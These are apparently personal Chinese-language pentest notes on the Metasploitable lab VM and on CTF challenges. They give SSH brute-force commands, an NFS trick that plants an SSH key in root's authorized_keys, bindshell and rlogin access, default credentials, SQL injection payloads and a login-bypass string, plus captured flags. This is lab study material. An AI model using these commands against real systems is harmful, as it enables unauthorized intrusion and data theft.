writeup-Metasploitable

还有vlnux漏洞库

信息搜集

1. nmap搜c段

2. 弱密码

   plain

   > 使用nmap爆破：命令如下：nmap -p 22 --script=ssh-brute --script-args userdb=用户字典,passdb=密码字典 目标机ip
   
   > 使用hydra爆破：
   
   > hydra -l root -P ssh_password.txt   ssh://目标机ip  -v
   
   > nmap -p- -sV -A -T4 192.168.126.131 -oX 131.xml -v
   
   > p- 指的是将目标端口指定为全部有效端口， A 即all oX输出为常用的xml文件  v为verbosity

3. ftp（21）弱密码及2.3.4版漏洞

   bash

   msfconsole
   setg LHISTS ip
   setg RHOSTS ip
   setg LPORT 7890
   search \#sea tab
   use
   run
   show info   \#sh 
   # 可以tab补全

4. appche2.2.8版（80）的php_cgi参数注入漏洞

5. mount挂载（111&&2049） 实现ssh密钥登录

   本地创建靶机同uid账号 useradd -u 2008 -d /home/vulnix -m vulnix 后切换以欺骗文件读取操作权限

   bash

   rpcinfo -p ip
   showmount -e ip  
   ssh-keygen
   mkdir /tmp/13
   mount -t nfs ip:/ /tmp/13/
   cat ~/.ssh/id_rsa.pub >>/tmp/13/root/.ssh/authorized_keys
   unmount /tmp/13
   ssh root@ip

6. samba（139）使用usermap id比whoami 好用

7. Rlogin（513）use 免密登录 rlogin -l root ip

8. java-rmi(1099) use java_rmi distcc

9. bindshell(1524) 免密码 nc ip 1524

10. mysql(3306) 空口令

11. postgres 弱口令（5432）

12. vnc 弱口令（5900）

13. irc（6667）use ircd

14. ajp13（8009）匿名访问

15. tomcat（8180）弱口令 tomcat/tomcat

sql注入

select group_concat(user) from user;
//tables
//columns
//schemata
//注入类型  1"--+a  或 1'--+q  +后必须有非&的任意字符   --为注释
//注入类型  1 and 1=1
//order by  4 判断字段数
//union+select+1,2,3--+p联合查询 前面语句错误union后面的才能执行
//UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每个 SELECT 语句中的列的顺序必须相同。
//+ 代替空格

1. 找到回显位置

   SQL

   /* 整型注入 */
   sql-bool.php?name=user1 and 1=1
   sql-bool.php?name=user1 and 1=2
   /* 字符型注入 */
   sql-bool.php?name=user1' and '1'='1
   sql-bool.php?name=user1' and '1'='2
   /* 字符型注入 */
   sql-bool.php?name=user1" and "1"="1
   sql-bool.php?name=user1" and "1"="2

2. 爆库

   SQL

   select GROUP_CONCAT(SCHEMA_NAME) from information_schema.SCHEMATA ;
   SELECT GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES t ;
   SELECT GROUP_CONCAT(COLUMN_NAME) from information_schema.`COLUMNS` c ; 
    
   SELECT DATABASE();

ascii 65(A)-122(z) 48(0)-57(9)

[[sqlitest]]

[!info] 通过SQL注入拿到管理员密码

https://www.cnblogs.com/shenggang/p/12144945.html

CTF

view-source:http://eci-2ze5hw1zx5x58rbpjmsm.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt

flag1:n1book{info_1

http://eci-2ze5hw1zx5x58rbpjmsm.cloudeci1.ichunqiu.com//index.php~

flag2:s_v3ry_im

得到n1book{info_1s_v3ry_imp0rtant_hack}

</div>
<script src="js/common.js"></script> 
<script src="js/play.js"></script> 
<script src="js/AI.js"></script> 
<script src="js/bill.js"></script>
<script src="js/[abcmlyx]{2}ctf[0-9]{3}.js"></script>  
<script src="js/gambit.js"></script>

正则表达式爆破

1. 查看原码

2. 发现奇怪的js

   http://5ebb02d9b65e4b9db888a327e72d68abf416a3bb9a8844e0.changame.ichunqiu.com/js/[abcmlyx]{2}ctf[0-9]{3}.js

3. 是个正则的表达式，使用burp suite 爆破

4. 抓包 intruder

   

5. 注意选择攻击类型为clusterbomb

   

6. 依次修改变量$1$等

   

   

7. 开始攻击

   

由于网站后台在进行数据库查询的时候没有对单引号进行过滤，当输入用户名【admin】和万能密码【2'or'1】时，执行的SQL语句为【Select user_id,user_type,email From users Where user_id='admin' And password='2'or'1'】。同时，由于SQL语句中逻辑运算符具有优先级，【=】优先于【and】，【and】优先于【or】，且适用传递性。因此，此SQL语句在后台解析时，分成两句【Select user_id,user_type,email From users Where user_id='admin' And password='2'】和【'1'】，两句bool值进行逻辑or运算，恒为TRUE。SQL语句的查询结果为TRUE，就意味着认证成功，也可以登录到系统中